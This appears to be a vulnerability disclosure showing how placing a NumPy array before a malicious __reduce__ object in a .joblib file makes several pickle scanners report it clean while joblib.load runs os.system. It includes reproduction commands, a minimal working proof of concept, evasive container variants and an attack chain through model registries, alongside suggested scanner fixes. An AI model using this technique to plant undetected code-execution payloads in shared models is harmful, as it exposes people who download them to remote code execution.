Joblib Scanner Bypass via Inline NumPy Array Bytes
Summary
A malicious .joblib file containing os.system RCE achieves 0/4 scanner detection (picklescan, modelscan, modelaudit, ClamAV (local)) while executing arbitrary commands on joblib.load(). The evasion requires no payload obfuscation β the dangerous os.system global is present in plaintext opcodes β but scanners never reach it because inline raw NumPy array bytes cause a mid-stream parse failure that all scanners treat as "clean."
Affected scanners: picklescan 1.0.4, modelscan 0.8.8, modelaudit 0.2.45, ClamAV 1.5.2
Affected format: Joblib (.joblib) β uncompressed, standard format
Impact: Arbitrary code execution at model load time, bypassing ProtectAI safety scan
Environment: Python 3.14.5, joblib 1.5.3, numpy 2.4.6, scikit-learn 1.8.0
Vulnerability
Root Cause
joblib's NumpyPickler serializes NumPy arrays by writing raw array bytes inline in the pickle stream, between standard pickle opcodes. joblib's NumpyUnpickler knows how to skip past these bytes (it overrides the BUILD opcode handler to call wrapper.read_array() which advances the file cursor). However, pickle scanners use pickletools.genops or equivalent opcode walkers that are not aware of these inline raw bytes. When the scanner hits a raw float/int byte mid-stream, it misinterprets it as a pickle opcode, fails with a ValueError, and silently returns "clean" instead of flagging the parse failure.
If an attacker places a malicious __reduce__ object after a NumPy array in pickle traversal order, the scanner aborts before reaching the malicious opcodes. The loader processes the entire file correctly, executing the payload.
Attack Requirements
- A pickle container (tuple, list, dict, or nested) serialized via
joblib.dump - At least one NumPy ndarray (any dtype, β₯1 element) positioned before the malicious object in pickle traversal order
- A malicious object with
__reduce__returning a dangerous callable (e.g.,os.system)
Why This Is Not the Known Joblib Compression Bypass
The previously reported joblib bypass (PickleCloak Appendix B.1) involves compressed joblib files where the compression magic bytes at position 0 cause scanners to fail immediately. This bypass uses uncompressed, standard-format joblib files. The parse failure occurs mid-stream due to inline NumPy array bytes, not at the start of the file. The mechanism is fundamentally different.
Files
| File | Description |
|---|---|
malicious_model.joblib |
PoC: fitted LinearRegression + malicious CustomLR in a tuple. 648 bytes. |
poc_generate.py |
Generates the malicious .joblib file |
poc_verify.py |
Scans with all scanners and loads to confirm RCE |
generalized_poc.py |
8 additional variants proving generalization (no sklearn needed) |
Reproduction
Step 1: Install dependencies
pip install joblib numpy scikit-learn picklescan modelscan modelaudit fickling
Step 2: Generate the PoC (or use the provided malicious_model.joblib)
python poc_generate.py
Step 3: Scan β observe all scanners report clean
picklescan --path malicious_model.joblib
# Expected: 0 infected files, 0 dangerous globals
modelscan -p malicious_model.joblib
# Expected: No issues found
python -c "
from modelaudit.core import scan_model_directory_or_file
result = scan_model_directory_or_file('malicious_model.joblib')
print('malicious:', result.get('malicious', False))
print('verdict:', result.get('pickle_verdict', False))
"
# Expected: malicious: False, verdict: False
Step 4: Load β observe code execution
python -c "import joblib; joblib.load('malicious_model.joblib')"
# Expected output includes: This is a malicious payload!
Step 5: Verify with controls
python poc_verify.py
# Runs full matrix: bypass cases (clean) vs control cases (detected)
Scanner Results
Bypass case: (fitted_LinearRegression, malicious_CustomLR)
| Scanner | Version | Verdict | Detects os.system? |
|---|---|---|---|
| picklescan | 1.0.4 | 0 infected | No β parse aborts before reaching REDUCE |
| modelscan | 0.8.8 | No issues found | No β parse aborts silently |
| modelaudit | 0.2.45 | malicious: False | No β logs WARNING but verdict stays safe |
| fickling | 0.1.11 | LIKELY_OVERTLY_MALICIOUS | No β flags NumpyArrayWrapper (fires on ALL fitted joblib files, including benign ones) |
| ClamAV | 1.5.2 | CLEAN | No β signatures gated on ZIP/torch container |
Control case: (malicious_CustomLR, fitted_LinearRegression) β reversed tuple order
| Scanner | Version | Verdict | Detects os.system? |
|---|---|---|---|
| picklescan | 1.0.4 | Dangerous | Yes β REDUCE precedes array bytes |
| modelscan | 0.8.8 | No issues found | No β modelscan is fail-open even when dangerous global was already observed |
| modelaudit | 0.2.45 | CRITICAL | Yes β REDUCE precedes array bytes |
Note: modelscan appears fail-open on parse abort regardless of prior findings. This is a separate issue.
Generalization
The bypass does NOT require scikit-learn, fitted models, or any specific container shape. Minimal example:
import numpy as np
import joblib
class Detonator:
def __reduce__(self):
import os
return (os.system, ('echo PWNED',))
# Any numpy array before the malicious object triggers the bypass
joblib.dump((np.array([1.0]), Detonator()), 'minimal_bypass.joblib')
# Scanners: clean. Loader: executes 'echo PWNED'
Tested container shapes (all bypass 4/5 scanners):
(np.array([1.0]), Detonator())[np.array([1.0, 2.0, 3.0]), Detonator()]{"data": np.array([1.0]), "evil": Detonator()}{"outer": (np.array([1.0]), Detonator())}(np.zeros(10, dtype=np.int64), Detonator())
Real-World Impact
This bypass affects every fitted scikit-learn model saved with joblib.dump. A fitted model contains NumPy arrays (the learned coefficients), which produce inline raw bytes. An attacker can:
- Take a legitimate fitted sklearn model
- Bundle it with a malicious
__reduce__object in a tuple - Upload to HuggingFace or any model registry
- ProtectAI's ModelScan reports "No issues found"
- Victim downloads and calls
joblib.load()β RCE
Suggested Fixes
For scanner maintainers (picklescan, modelscan, modelaudit):
- Fail-closed on parse abort. Any
pickletools.genopsmid-stream exception should be treated as CRITICAL/suspicious, not silently clean. - Format-aware parsing. Recognize
joblib.numpy_pickle.NumpyArrayWrapperin the opcode stream and consume the documented inline-bytes region instead of interpreting raw array bytes as opcodes.
For joblib maintainers:
- Document the inline-bytes protocol so scanner authors can implement format-aware walkers.
- Consider providing a
joblib.safe_load(path, *, allowed_globals)analogous to PyTorch'sweights_only=True.